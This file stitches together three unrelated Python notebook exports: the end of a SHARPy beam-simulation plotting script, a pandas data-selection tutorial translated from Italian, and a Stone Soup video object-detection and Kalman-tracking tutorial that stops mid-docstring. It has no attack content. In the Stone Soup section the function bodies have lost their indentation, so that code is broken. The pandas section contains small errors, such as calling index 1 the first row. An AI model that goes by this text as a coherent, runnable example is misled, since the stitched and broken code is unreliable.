    model.clean_test_files(route, case_name)
    model.generate_fem_file(route, case_name, Nelem, 0, -float(jForce+1)*DeltaForce)
    model.generate_solver_file(route, case_name)
    case_foll = sharpy.sharpy_main.main(['', route + case_name + '.sharpy'])
    x2[jForce, 0:N] = case_foll.structure.timestep_info[0].pos[:, 0]
    z2[jForce, 0:N] = case_foll.structure.timestep_info[0].pos[:, 2]
# +
#Plot results.
fig, axs = plt.subplots(nrows=1, ncols=2, figsize=(15, 6))
ax0 = axs[0]
ax0.plot([0,Nforces],[0, 0],linestyle=':', c='black')
ax0.plot(range(Nforces+1), np.concatenate((5, x1[0:Nforces,-1]), axis=None)-5*np.ones(Nforces+1),linestyle='-', c='black')
ax0.plot(range(Nforces+1), np.concatenate((5, x2[0:Nforces,-1]), axis=None)-5*np.ones(Nforces+1),linestyle='--', c='black')
#ax0.axis('equal')
ax0.grid()
ax0.set_xlabel('Force (N) x 10^5')
ax0.set_ylabel('Tip horizontal displacement (m)')
ax0.set(xlim=(0, Nforces), ylim=(-6, 1))
ax1 = axs[1]
ax1.plot([0,Nforces],np.concatenate((0, z1[0,-1]*Nforces), axis=None),linestyle=':', c='black')
ax1.plot(range(Nforces+1), np.concatenate((0, z1[0:Nforces,-1]), axis=None),linestyle='-', c='black')
ax1.plot(range(Nforces+1), np.concatenate((0, z2[0:Nforces,-1]), axis=None),linestyle='--', c='black')
#ax1.axis('equal')
ax1.grid()
ax1.set_xlabel('Force (N) x 10^5')
ax1.set_ylabel('Tip vertical displacement (m)')
ax1.set(xlim=(0, Nforces), ylim=(-5, 1))
ax1.legend(['Linear','Dead','Follower'])
fig.savefig("images/ncb1-foll-displ.eps", format='eps', dpi=1000, bbox_inches="tight")
# -
model.clean_test_files(route, case_name)
# <a id='start'></a>
# # Collecting
#
# This notebook explains the main methods for collecting data and performing a first round of data manipulation. <br>
# The most widely used library for these operations is **Pandas**. <br>
# <br>
# The notebook is divided into the following sections:<br>
# - [DataFrame and Series](#section1)<a href='#section1'></a>; <br>
# - [Importing data from external sources](#section2)<a href='#section2'></a>; <br>
# - [Selecting data from the dataset](#section3)<a href='#section3'></a>; <br>
# - [Index-based Selection](#section4)<a href='#section4'></a><br>
# - [Label-based Selection](#section5)<a href='#section5'></a> <br>
# - [Conditional Selection](#section6)<a href='#section6'></a>
# <a id='section1'></a>
# ## DataFrame and Series
# We introduce the **Pandas** library, used to create and manage the **Series** and **DataFrame** objects.<br>
#
# *Series* and *DataFrame* objects can be imported from files (csv, xls, html, ...) or created manually. <br>
#
# Let's start by importing the Pandas library
# +
import pandas as pd
print("Setup Complete.")
# -
# A **DataFrame** is a table containing an array of individual entries, each of which has a certain value. Each entry corresponds to a row (or record) and a column.
pd.DataFrame({'Yes': [50, 21], 'No': [131, 2]})
# A DataFrame can also contain string values, not just numeric ones
pd.DataFrame({'Audi': ['Migliore', 'Peggiore'], 'Mercedes': ['Peggiore', 'Migliore']})
# The rows of a DataFrame are called the **Index**, and you can assign values to it with the following code:
pd.DataFrame({'Audi': ['Migliore', 'Peggiore'], 'Mercedes':['Peggiore', 'Migliore']}, index = ['Utilitaria', 'Sportiva'])
# A **Series** is a sequence of data values. If a DataFrame is a table, a Series is a list.
pd.Series([1, 2, 3, 4, 5])
# You can assign values to the rows of a Series in the same way as before, using an index parameter. <br>
# Also, a Series has no column names; it only has one overall name
pd.Series([300, 450, 400], index=['2015 Sales', '2016 Sales', '2017 Sales'], name='Product X')
# <a id='section2'></a>
# ## Importing data from external sources
# In this section of the notebook we look at how to import data from external sources (csv, excel and html) using the Pandas library.
# ### Importing data from a csv
# The method used to import data from a csv with the Pandas library is __[read_csv](https://pandas.pydata.org/pandas-docs/stable/generated/pandas.read_csv.html)__. <br>
# The *read_csv* method takes many parameters; the most important ones are:
# - sep
# - delimiter
# - header
# - index_col
# - skiprows
# - na_values <br>
# ...
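# As a quick illustration of a few of these parameters (using a small inline
# CSV made up for the example, not the course dataset), a read might look like:

```python
import io
import pandas as pd

# Hypothetical sample data, just to demonstrate the parameters
raw = """id;name;age
1;Anna;22
2;Marco;NA
3;Luca;31
"""

# sep sets the field separator, index_col promotes 'id' to the index,
# and na_values lists the strings to treat as missing values
df = pd.read_csv(io.StringIO(raw), sep=';', index_col='id', na_values=['NA'])
print(df)
```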
dataset = pd.read_csv("dataset.csv", index_col = 0)
dataset
# The .head() method shows the first rows (by default the first 5) of a DataFrame or a Series
dataset.head()
# The .tail() method shows the last rows (by default the last 5) of a DataFrame or a Series
dataset.tail()
# ### Importing data from an excel file
# The method used to import data from an excel file with the Pandas library is __[read_excel](https://pandas.pydata.org/pandas-docs/stable/generated/pandas.read_excel.html)__. <br>
# In this case we need to indicate which sheet of the excel file contains the dataframe we want to import, using the *sheet_name* parameter.
dataset = pd.read_excel("dataset_excel_workbook.xlsx", sheet_name='dataset', index_col=0)
dataset
# ### Importing data from a website
# The method used to import a table from a website with the Pandas library is __[read_html](https://pandas.pydata.org/pandas-docs/stable/generated/pandas.read_html.html#pandas.read_html)__. <br>
#
# The most important parameters to consider when importing are the following: <br>
# - **skiprows** = the number of rows to skip during the import; <br>
# - **header** = the row to use to build the column headers.
classifica_serie_a = pd.read_html(io="http://www.legaseriea.it/it/serie-a/classifica", skiprows=1, header=0)
classifica_serie_a
# The *read_html* function returns a *list of DataFrames*. <br>
# At this point we can take the DataFrame identified by element 0 of the object returned by *read_html*.
serie_a = classifica_serie_a[0]
serie_a.head()
# You can get the names of the columns of a DataFrame or a Series through the **.columns** attribute
serie_a.columns
type(serie_a)
serie_a
# <a id='section3'></a>
# ## Selecting data from the dataset
# In this section we learn the main methods for selecting the columns and rows of a dataset, stored as a DataFrame or a Series.
# Before continuing, note that the **Pandas** library does _not_ use the naming commonly used to identify the axes of a database, namely *dimension* and *feature*. <br>
# Pandas refers to the dimensions of a matrix with the term **axes**: it uses **(axis = 0)** to refer to the rows of a dataset and **(axis = 1)** to refer to the columns of a dataset.
# <img src="axis_Pandas.jpg">
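# As a quick sketch of how the two axes behave (using a toy DataFrame made up
# for the example), an aggregation such as sum() can run along either axis:

```python
import pandas as pd

df = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})

# axis=0: the operation runs down the rows, giving one result per column
col_sums = df.sum(axis=0)

# axis=1: the operation runs across the columns, giving one result per row
row_sums = df.sum(axis=1)
```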
# Let's rename the dataset we imported earlier from the excel file
titanic = dataset
titanic.head()
# +
# Select the Age column of the titanic dataset
titanic['Age'] # you can also use titanic.Age
# -
# In the previous cell we selected a column from a DataFrame, and it was extracted as a **Series**. <br>
# We showed two ways to extract a column from a DataFrame; neither one is the best, but if the column name contained a space (say it were "Age Female"), we would have to use the square-bracket notation.
# Now let's select the first row of the Age column
titanic['Age'][1]
# Pandas uses two paradigms to select data: <br>
# - Index-based: based on the numerical position of the data; <br>
# - Label-based: based on the value of a data index.
# <a id='section4'></a>
# ### Index-Based Selection
# The accessor used to perform an *index-based selection* is **iloc**.<br>
# For example, let's select the first row of the titanic dataset:
titanic.iloc[0]
# Both **iloc** and **loc** (which we will see later) are *row-first, column-second*, i.e. they take the row value as the first input and the column value as the second. This is the opposite of the usual Python behaviour, which is *column-first, row-second*. <br>
# Indeed, a few lines above, before introducing *iloc* and *loc*, we used the code "titanic['Age'][1]", i.e. dataset[column][row].
#
# To get the desired column with iloc we use the following syntax:
# Print ALL rows of the name column
titanic.iloc[:,1]
# Print the first 3 rows of the name column
titanic.iloc[:3,1]
# Print only the rows we want from the name column
# In this case we use a list to indicate the rows we want
titanic.iloc[[1,2,3,5,7],1]
# <a id='section5'></a>
# ### Label-Based Selection
# The accessor used to perform a *label-based selection* is **loc**.<br>
# To get the first record of the "Name" field of the titanic dataset we use the following syntax:
titanic.loc[1, 'Name']
titanic.loc[2, ['Name', 'Age', 'Pclass']]
# When choosing between, or switching from, *loc* and *iloc*, there is one **difference** that is important to keep in mind: **the two methods use slightly different indexing schemes**.<br>
#
# **iloc** uses the Python stdlib indexing scheme, where **the first element of the range is included and the last one excluded.** So iloc[0:10] will select entries 0,...,9. <br>
# **loc**, meanwhile, **indexes inclusively.** So loc[0:10] will select entries 0,...,10.
#
# Suppose we have a DataFrame with a simple numeric index, e.g. 0,...,1000. In that case df.iloc[0:1000] will return 1000 entries, while df.loc[0:1000] will return 1001! To get 1000 entries using loc, we would have to use df.loc[0:999].
#
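# The off-by-one behaviour described above is easy to verify on a small
# Series with a numeric index (a toy example, not the titanic dataset):

```python
import pandas as pd

s = pd.Series(range(11))  # index labels 0..10

# iloc uses half-open ranges: the stop position is excluded
assert len(s.iloc[0:10]) == 10

# loc slices by label, inclusive of the stop label
assert len(s.loc[0:10]) == 11
```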
# <a id='section6'></a>
# ### Conditional Selection
# During our analyses we may need to select parts of a dataset based on the values that its fields can take, i.e. to apply conditions to our selections.
# Suppose we want to select only the women from the titanic dataset; let's start by asking which rows have the value "female" in the "Sex" column:
titanic.Sex == "female"
# We obtained a column of True/False values that we can use with the *loc* operator to select only the rows of the dataset referring to women:
titanic.loc[titanic.Sex == "female"]
# Now suppose we want to select the women who are under 30 years old:
# we use the logical operator &
titanic.loc[(titanic.Sex == "female") & (titanic.Age < 30)]
# Suppose we want to select the women, or all the passengers under 30 years old; in this case we need to use the **or** operator: |
titanic.loc[(titanic.Sex == "female") | (titanic.Age < 30)]
# Pandas has some built-in *conditional selectors* that can be useful during analyses:<br>
# - **isin**: selects the data whose value is in a list of values; <br>
# - **isnull** (and its complement **notnull**): selects the values that are (or are not) null (NaN).
#
# Suppose we want to select only the people belonging to the second and third class (Pclass field).
titanic.loc[titanic.Pclass.isin([2,3])]
# Suppose we want to select all the passengers whose age is null:
titanic.loc[titanic.Age.isnull()]
# At this point, once a selection has been made, we can also assign a value to a field. <br>
# Let's assign an age of 35 to everyone whose age value is null.
titanic.loc[titanic.Age.isnull(), 'Age'] = 35
titanic
# Below are some useful links: <br>
# - <a href='https://pandas.pydata.org/pandas-docs/stable/indexing.html'>Pandas - Indexing and Selecting Data</a><br>
# - <a href='https://pandas.pydata.org/pandas-docs/stable/comparison_with_sql.html'>Pandas - Comparison with Sql</a><br>
# [Click here to go back to the top of the page](#start)
# This paragraph concludes the "Collecting" notebook; the next one will be "Wrangling".
# If you have any questions, you can write to us on Teams!<br>
# See you soon!
# %matplotlib inline
#
# Video processing, Object detection & Tracking
# ==============================================
#
# **Demonstrating the video processing capabilities of Stone Soup**
#
# This notebook will guide you progressively through the steps necessary to:
#
# 1. Use the Stone Soup :class:`~.FrameReader` components to open and process video data;
# 2. Use the :class:`~.TensorFlowBoxObjectDetector` to detect objects in video data, making use of Tensorflow object detection models;
# 3. Build a :class:`~.MultiTargetTracker` to perform tracking of multiple objects in video data.
#
#
#
# Software dependencies
# ---------------------
# Before we begin with this tutorial, there are a few things that we need to install in order to
# proceed.
#
# FFmpeg
# ~~~~~~
# FFmpeg is a free and open-source project consisting of a vast software suite of libraries and
# programs for handling video, audio, and other multimedia files and streams. Stone Soup (or more
# accurately some of its extra dependencies) makes use of FFmpeg to read and output video. Download
# links and installation instructions for FFmpeg can be found `here <https://www.ffmpeg.org/download.html>`__.
#
# TensorFlow
# ~~~~~~~~~~
# TensorFlow is a free and open-source software library for dataflow and differentiable programming
# across a range of tasks, such as machine learning. TensorFlow includes an Object Detection API that
# makes it easy to construct, train and deploy object detection models, as well as a collection of
# pre-trained models that can be used for out-of-the-box inference. A quick TensorFlow installation
# tutorial can be found `here <https://tensorflow2objectdetectioninstallation.readthedocs.io/en/latest/>`__.
#
# Stone Soup
# ~~~~~~~~~~
# To perform video-processing using Stone Soup, we need to install some extra dependencies. The
# easiest way to achieve this is by running the following commands in a Terminal window:
#
# .. code::
#
# git clone "https://github.com/dstl/Stone-Soup.git"
# cd Stone-Soup
# python -m pip install -e .[dev,video,tensorflow]
#
# Pytube
# ~~~~~~
# We will also use pytube_ to download a Youtube video for the purposes of this tutorial. In the
# same Terminal window, run the following command to install ``pytube``:
#
# .. code::
#
# pip install pytube3
#
#
# Using the Stone Soup :class:`~.FrameReader` classes
# ---------------------------------------------------
# The :class:`~.FrameReader` abstract class is intended as the base class for Stone Soup readers
# that read frames from any form of imagery data. As of now, Stone Soup has two implementations of
# :class:`~.FrameReader` subclasses:
#
# 1. The :class:`~.VideoClipReader` component, which uses MoviePy_ to read video frames from a file.
# 2. The :class:`~.FFmpegVideoStreamReader` component, which uses ffmpeg-python_ to read frames from real-time video streams (e.g. RTSP).
#
# In this tutorial we will focus on the :class:`~.VideoClipReader`, since setting up a stream for
# the :class:`~.FFmpegVideoStreamReader` is more involved. Nevertheless, the use and interface of
# the two readers is mostly identical after initialisation and an example of how to initialise the
# latter is also provided below.
#
#
# Download and store the video
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# First we will download the video that we will use throughout this tutorial. The code snippet
# shown below will download the video and save it in your working directory as ``sample1.mp4``.
#
#
# +
import os
from pytube import YouTube
VIDEO_FILENAME = 'sample1'
VIDEO_EXTENSION = '.mp4'
VIDEO_PATH = os.path.join(os.getcwd(), VIDEO_FILENAME + VIDEO_EXTENSION)
if not os.path.exists(VIDEO_PATH):
    yt = YouTube('http://www.youtube.com/watch?v=MNn9qKG2UFI')
    yt.streams[0].download(filename=VIDEO_FILENAME)
# -
# Building the video reader
# ~~~~~~~~~~~~~~~~~~~~~~~~~
#
# VideoClipReader
# ***************
# We will use the :class:`~.VideoClipReader` class to read and replay the downloaded file. We also
# configure the reader to only replay the clip for a duration of 2 seconds between `00:10` and
# `00:12`.
#
#
import datetime
from stonesoup.reader.video import VideoClipReader
start_time = datetime.timedelta(minutes=0, seconds=10)
end_time = datetime.timedelta(minutes=0, seconds=12)
frame_reader = VideoClipReader(VIDEO_PATH, start_time, end_time)
# It is also possible to apply clip transformations and effects, as per the
# `MoviePy documentation <https://zulko.github.io/moviepy/getting_started/effects.html>`_.
# The underlying MoviePy :class:`~VideoFileClip` instance can be accessed through the
# :attr:`~.VideoClipReader.clip` class property. For example, we can crop out 100 pixels from
# the top and left of the frames, as they are read by the reader, as shown below.
#
#
from moviepy.video.fx import all
frame_reader.clip = all.crop(frame_reader.clip, 100, 100)
num_frames = len(list(frame_reader.clip.iter_frames()))
# FFmpegVideoStreamReader
# ***********************
# For reference purposes, we also include here an example of how to build a
# :class:`~.FFmpegVideoStreamReader`. Let's assume that we have a camera which broadcasts its feed
# through a public RTSP stream, under the URL ``rtsp://192.168.55.10:554/stream``. We can build a
# :class:`~.FFmpegVideoStreamReader` object to read frames from this stream as follows:
#
# .. code:: python
#
# in_opts = {'threads': 1, 'fflags': 'nobuffer'}
# out_opts = {'format': 'rawvideo', 'pix_fmt': 'bgr24'}
# stream_url = 'rtsp://192.168.55.10:554/stream'
# video_reader = FFmpegVideoStreamReader(stream_url, input_opts=in_opts, output_opts=out_opts)
#
# .. important::
#
# Note that the above code is an illustrative example and will not be run.
#
# :attr:`~.FFmpegVideoStreamReader.input_opts` and :attr:`~.FFmpegVideoStreamReader.output_opts`
# are optional arguments, which allow users to specify options for the input and output FFmpeg
# streams, as documented by `FFmpeg <https://ffmpeg.org/ffmpeg.html#toc-Options>`__ and
# ffmpeg-python_.
#
#
# Reading frames from the reader
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# All :class:`~.FrameReader` objects, of which the :class:`~.VideoClipReader` is a subclass,
# generate frames in the form of :class:`~.ImageFrame` objects. Below we show an example of how to
# read and visualise these frames using `matplotlib`.
#
#
# +
from copy import copy
from PIL import Image
from matplotlib import pyplot as plt
from matplotlib import animation
fig, ax = plt.subplots(num="VideoClipReader output")
artists = []
print('Running FrameReader example...')
for timestamp, frame in frame_reader:
    if not (len(artists)+1) % 10:
        print("Frame: {}/{}".format(len(artists)+1, num_frames))
    # Read the frame pixels
    pixels = copy(frame.pixels)
    # Plot output
    image = Image.fromarray(pixels)
    ax.axes.xaxis.set_visible(False)
    ax.axes.yaxis.set_visible(False)
    fig.tight_layout()
    artist = ax.imshow(image, animated=True)
    artists.append([artist])
ani = animation.ArtistAnimation(fig, artists, interval=20, blit=True, repeat_delay=200)
# -
# Using the :class:`~.TensorFlowBoxObjectDetector` class
# ------------------------------------------------------
# We now continue by demonstrating how to use the :class:`~.TensorFlowBoxObjectDetector` to detect
# objects, and more specifically cars, within the frames read in by our ``video_reader``. The
# :class:`~.TensorFlowBoxObjectDetector` can utilise both pre-trained and custom-trained TensorFlow
# object detection models which generate detection in the form of bounding boxes. In this example,
# we will make use of a pre-trained model from the
# `TensorFlow detection model zoo <https://github.com/tensorflow/models/blob/master/research/object_detection/g3doc/detection_model_zoo.md>`_,
# but the process of using a custom-trained TensorFlow model is the same.
#
#
# Downloading the model
# ~~~~~~~~~~~~~~~~~~~~~
# The code snippet shown below is used to download the object detection model checkpoint file
# (.pb) that we will feed into the :class:`~.TensorFlowBoxObjectDetector` , as well as the label
# file (.pbtxt) which contains a list of strings used to add the correct label to each detection
# (e.g. car).
#
# The particular detection algorithm we will use is the Faster-RCNN, with an Inception
# Resnet v2 backbone and running in Atrous mode with low proposals, pre-trained on the MSCOCO
# dataset.
#
# <div class="alert alert-danger"><h4>Warning</h4><p>**The downloaded model has a size of approximately 500 MB**. Therefore it is advised that you
# run the script on a stable (ideally not mobile) internet connection. The files will only be
# downloaded the first time the script is run. In consecutive runs the code will skip this step,
# provided that ``PATH_TO_CKPT`` and ``PATH_TO_LABELS`` are valid paths.</p></div>
#
#
# +
import urllib
import tarfile
MODEL_NAME = 'faster_rcnn_inception_resnet_v2_atrous_lowproposals_coco_2018_01_28'
MODEL_TAR = MODEL_NAME + '.tar.gz'
MODELS_DOWNLOAD_BASE = 'http://download.tensorflow.org/models/object_detection/'
PATH_TO_CKPT = os.path.join(os.getcwd(), MODEL_NAME + '/frozen_inference_graph.pb')
# Download and extract model
if not os.path.exists(PATH_TO_CKPT):
    print("Downloading model. This may take a while...")
    urllib.request.urlretrieve(MODELS_DOWNLOAD_BASE + MODEL_TAR, MODEL_TAR)
    tar_file = tarfile.open(MODEL_TAR)
    for file in tar_file.getmembers():
        file_name = os.path.basename(file.name)
        if 'frozen_inference_graph.pb' in file_name:
            tar_file.extract(file, os.getcwd())
    tar_file.close()
    os.remove(MODEL_TAR)
LABEL_FILE = 'mscoco_label_map.pbtxt'
LABELS_DOWNLOAD_BASE = \
'https://raw.githubusercontent.com/tensorflow/models/master/research/object_detection/data/'
PATH_TO_LABELS = os.path.join(os.getcwd(), "{}/{}".format(MODEL_NAME, LABEL_FILE))
# Download labels
if not os.path.exists(PATH_TO_LABELS):
    print("Downloading label file...")
    urllib.request.urlretrieve(LABELS_DOWNLOAD_BASE + LABEL_FILE, PATH_TO_LABELS)
# -
# Building the detector
# ~~~~~~~~~~~~~~~~~~~~~
# Next, we proceed to initialise our detector object. To do this, we require the ``frame_reader``
# object we built previously, as well as a path to the (downloaded) model checkpoint (.pb) and
# label (.pbtxt) files, which we have already defined above under the ``PATH_TO_CKPT`` and
# ``PATH_TO_LABELS`` variables.
#
# The :class:`~.TensorFlowBoxObjectDetector` object can optionally be configured to digest frames
# from the provided reader asynchronously, and only perform detection on the last frame digested,
# by setting ``run_async=True``. This is suitable when the detector is applied to readers generating
# a live feed (e.g. the :class:`~.FFmpegVideoStreamReader`), where real-time processing is
# paramount. Since we are using a :class:`~.VideoClipReader` in this example, we set
# ``run_async=False``, which is also the default setting.
#
# Finally, the ``session_config`` parameter can be used to provide a `ConfigProto
# <https://www.tensorflow.org/code/tensorflow/core/protobuf/config.proto>`_ protocol buffer with
# configuration options for the TensorFlow session run by the detector. Below we show an example of
# how this can be used to prevent TensorFlow from mapping all of the GPU memory, which can lead to
# cuDNN errors when the host GPU is used by other processes.
#
#
# +
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # Suppress TensorFlow logging
import tensorflow as tf
from stonesoup.detector.tensorflow import TensorFlowBoxObjectDetector
config = tf.compat.v1.ConfigProto()
config.gpu_options.allow_growth = True # Allow dynamic allocation of GPU memory to TF session
run_async = False # Configure the detector to run in synchronous mode
detector = TensorFlowBoxObjectDetector(frame_reader, PATH_TO_CKPT, PATH_TO_LABELS,
run_async=run_async, session_config=config)
# -
# Filtering-out unwanted detections
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# In this section we showcase how we can utilise Stone Soup :class:`~.Feeder` objects in order to
# filter out unwanted detections. One example of feeder we can use is the
# :class:`~.MetadataValueFilter`, which allows us to filter detections by applying a custom
# operator on particular fields of the :attr:`~.Detection.metadata` property of detections.
#
# Each detection generated by :class:`~.TensorFlowBoxObjectDetector` carries the following
# :attr:`~.Detection.metadata` fields:
#
# - ``raw_box``: The raw bounding box containing the normalised coordinates ``[y_0, x_0, y_1, x_1]``, as generated by TensorFlow.
# - ``class``: A dict with keys ``id`` and ``name`` relating to the id and name of the detection class.
# - ``score``: A float in the range ``(0, 1]`` indicating the detector's confidence.
#
# Detection models trained on the MSCOCO dataset, such as the one we downloaded, are able to detect
# 90 different classes of objects (see the `downloaded .pbtxt file <https://github.com/tensorflow/models/blob/master/research/object_detection/data/mscoco_label_map.pbtxt>`_
# for a full list). Instead, as we discussed at the beginning of the tutorial, we wish to limit the
# detections to only those classified as cars. This can be done as follows:
#
#
from stonesoup.feeder.filter import MetadataValueFilter
detector = MetadataValueFilter(detector, 'class', lambda x: x['name'] == 'car')
# Continuing, we may want to filter out detections which have a low confidence score:
#
#
detector = MetadataValueFilter(detector, 'score', lambda x: x > 0.1)
# Finally, we observed that the detector tends to incorrectly generate detections which are much
# larger than the size we expect for a car. Therefore, we can filter out those detections by only
# allowing ones whose width is less than 20\% of the frame width (i.e. ``x_1-x_0 < 0.2``):
#
#
detector = MetadataValueFilter(detector, 'raw_box', lambda x: x[3]-x[1] < 0.2)
# You are encouraged to comment out any/all of the above filter definitions and observe the
# produced output.
#
#
# Reading and visualising detections
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Detections generated by the :class:`~.TensorFlowBoxObjectDetector` have a 4-dimensional
# :attr:`~.Detection.state_vector` in the form of a bounding boxes that captures the area of the
# frame where an object is detected. Each bounding box is represented by a vector of the form
# ``[x, y, w, h]``, where ``x, y`` denote the relative pixel coordinates of the top-left corner,
# while ``w, h`` denote the relative width and height of the bounding box. Below we show an example
# of how to read and visualise these detections using `matplotlib`.
#
#
# +
import numpy as np
from PIL import ImageDraw
def draw_detections(image, detections, show_class=False, show_score=False):
""" Draw detections on an image
Parameters
----------
image: :class:`PIL.Image`
Image on which to draw the detections
detections: set of :class:`~.Detection`
A set of detections generated by :class:`~.TensorFlowBoxObjectDetector`
show_class: bool
Whether to draw the class of the object. Default is ``False``
show_score: bool
Whether to draw the score of the object. Default is ``False``
Returns
-------
: :class:`PIL.Image`
Image with detections drawn
"""
draw = ImageDraw.Draw(image)
for detection in detections:
x0, y0, w, h = np.array(detection.state_vector).reshape(4)
x1, y1 = (x0 + w, y0 + h)
draw.rectangle([x0, y0, x1, y1], outline=(0, 255, 0), width=1)
class_ = detection.metadata['class']['name']
score = round(float(detection.metadata['score']),2)
if show_class and show_score:
draw.text((x0,y1 + 2), '{}:{}'.format(class_, score), fill=(0, 255, 0))
elif show_class:
draw.text((x0, y1 + 2), '{}'.format(class_), fill=(0, 255, 0))
elif show_score:
draw.text((x0, y1 + 2), '{}'.format(score), fill=(0, 255, 0))
del draw
return image
fig2, ax2 = plt.subplots(num="TensorFlowBoxObjectDetector output")
artists2 = []
print("Running TensorFlowBoxObjectDetector example... Be patient...")
for timestamp, detections in detector:
if not (len(artists2)+1) % 10:
print("Frame: {}/{}".format(len(artists2)+1, num_frames))
# Read the frame pixels
frame = frame_reader.frame
pixels = copy(frame.pixels)
# Plot output
image = Image.fromarray(pixels)
image = draw_detections(image, detections, True, True)
ax2.axes.xaxis.set_visible(False)
ax2.axes.yaxis.set_visible(False)
fig2.tight_layout()
artist = ax2.imshow(image, animated=True)
artists2.append([artist])
ani2 = animation.ArtistAnimation(fig2, artists2, interval=20, blit=True, repeat_delay=200)
# -
# Constructing a Multi-Object Video Tracker
# -----------------------------------------
# In this final segment of the tutorial we will see how we can use the above demonstrated
# components to perform tracking of multiple objects within Stone Soup.
#
# Defining the state-space models
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Transition Model
# ****************
# We begin our definition of the state-space models by defining the hidden state
# $\mathrm{x}_k$, i.e. the state that we wish to estimate:
#
# \begin{align}\mathrm{x}_k = [x_k, \dot{x}_k, y_k, \dot{y}_k, w_k, h_k]\end{align}
#
# where $x_k, y_k$ denote the pixel coordinates of the top-left corner of the bounding box
# containing an object, with $\dot{x}_k, \dot{y}_k$ denoting their respective rate of change,
# while $w_k$ and $h_k$ denote the width and height of the box, respectively.
#
# We assume that $x_k$ and $y_k$ move with nearly :class:`~.ConstantVelocity`, while
# $w_k$ and $h_k$ evolve according to a :class:`~.RandomWalk`. Using these assumptions,
# we proceed to construct our Stone Soup :class:`~.TransitionModel` as follows:
#
#
from stonesoup.models.transition.linear import (CombinedLinearGaussianTransitionModel,
ConstantVelocity, RandomWalk)
t_models = [ConstantVelocity(20**2), ConstantVelocity(20**2), RandomWalk(20**2), RandomWalk(20**2)]
transition_model = CombinedLinearGaussianTransitionModel(t_models)
# Measurement Model
# *****************
# Continuing, we define the measurement state $\mathrm{y}_k$, which follows naturally from
# the form of the detections generated by the :class:`~.TensorFlowBoxObjectDetector` we previously
# discussed:
#
# \begin{align}\mathrm{y}_k = [x_k, y_k, w_k, h_k]\end{align}
#
# We make use of a 4-dimensional :class:`~.LinearGaussian` model as our :class:`~.MeasurementModel`,
# whereby we can see that the individual indices of $\mathrm{y}_k$ map to indices `[0,2,4,5]`
# of the 6-dimensional state $\mathrm{x}_k$:
#
#
from stonesoup.models.measurement.linear import LinearGaussian
measurement_model = LinearGaussian(ndim_state=6, mapping=[0, 2, 4, 5],
noise_covar=np.diag([1**2, 1**2, 3**2, 3**2]))
# Defining the tracker components
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# With the state-space models defined, we proceed to build our tracking components
#
# Filtering
# *********
# Since we have assumed Linear-Gaussian models, we will be using a Kalman Filter to perform
# filtering of the underlying single-target densities. This is done by making use of the
# :class:`~.KalmanPredictor` and :class:`~.KalmanUpdater` classes, which we define below:
#
#
from stonesoup.predictor.kalman import KalmanPredictor
predictor = KalmanPredictor(transition_model)
from stonesoup.updater.kalman import KalmanUpdater
updater = KalmanUpdater(measurement_model)
# <div class="alert alert-info"><h4>Note</h4><p>For more information on the above classes and how they operate you can refer to the Stone
# Soup tutorial on
# `using the Kalman Filter <https://stonesoup.readthedocs.io/en/latest/auto_tutorials/01_KalmanFilterTutorial.html>`_.</p></div>
#
# Data Association
# ****************
# We utilise a :class:`~.DistanceHypothesiser` to generate hypotheses between tracks and
# measurements, where :class:`~.Mahalanobis` distance is used as a measure of quality:
#
#
from stonesoup.hypothesiser.distance import DistanceHypothesiser
from stonesoup.measures import Mahalanobis
hypothesiser = DistanceHypothesiser(predictor, updater, Mahalanobis(), 10)
# Continuing, the :class:`~.GNNWith2DAssignment` class is used to perform fast joint data association,
# based on the Global Nearest Neighbour (GNN) algorithm:
#
#
from stonesoup.dataassociator.neighbour import GNNWith2DAssignment
data_associator = GNNWith2DAssignment(hypothesiser)
# <div class="alert alert-info"><h4>Note</h4><p>For more information on the above classes and how they operate you can refer to the
# `Data Association - clutter <https://stonesoup.readthedocs.io/en/latest/auto_tutorials/05_DataAssociation-Clutter.html>`_
# and `Data Association - Multi-Target Tracking <https://stonesoup.readthedocs.io/en/latest/auto_tutorials/06_DataAssociation-MultiTargetTutorial.html>`_
# tutorials.</p></div>
#
#
# Track Initiation
# ****************
# For initialising tracks we will use a :class:`~.MultiMeasurementInitiator`, which allows our
# tracker to tentatively initiate tracks from unassociated measurements, and hold them within the
# initiator until they have survived for at least 10 frames. We also define a
# :class:`~.UpdateTimeStepsDeleter` deleter to be used by the initiator to delete tentative tracks
# that have not been associated to a measurement in the last 3 frames.
#
#
from stonesoup.types.state import GaussianState
from stonesoup.types.array import CovarianceMatrix, StateVector
from stonesoup.initiator.simple import MultiMeasurementInitiator
from stonesoup.deleter.time import UpdateTimeStepsDeleter
prior_state = GaussianState(StateVector(np.zeros((6,1))),
CovarianceMatrix(np.diag([100**2, 30**2, 100**2, 30**2, 100**2, 100**2])))
deleter_init = UpdateTimeStepsDeleter(time_steps_since_update=3)
initiator = MultiMeasurementInitiator(prior_state, measurement_model, deleter_init,
data_associator, updater, min_points=10)
# Track Deletion
# **************
# For confirmed tracks we again use an :class:`~.UpdateTimeStepsDeleter`, but this time configured
# to delete tracks after they have not been associated to a measurement in the last 15 frames.
#
#
deleter = UpdateTimeStepsDeleter(time_steps_since_update=15)
# <div class="alert alert-info"><h4>Note</h4><p>For more information on the above classes and how they operate you can refer to the Stone
# `Initiators & Deleters <https://stonesoup.readthedocs.io/en/latest/auto_tutorials/09_Initiators_&_Deleters.html>`_
# tutorial.</p></div>
#
# Building the tracker
# ~~~~~~~~~~~~~~~~~~~~
# Now that we have defined all our tracker components we proceed to build our multi-target tracker:
#
#
from stonesoup.tracker.simple import MultiTargetTracker
tracker = MultiTargetTracker(
initiator=initiator,
deleter=deleter,
detector=detector,
data_associator=data_associator,
updater=updater,
)
# Running the tracker
# ~~~~~~~~~~~~~~~~~~~
#
#
# +
def draw_tracks(image, tracks, show_history=True, show_class=True, show_score=True):
""" Draw tracks on an image
Parameters
----------
image: :class:`PIL.Image`
Image on which to draw the tracks
tracks: set of :class:`~.Track`
A set of tracks generated by our :class:`~.MultiTargetTracker`
show_history: bool
Whether to draw the trajectory of the track. Default is ``True``
show_class: bool
Whether to draw the class of the object. Default is ``True``
show_score: bool
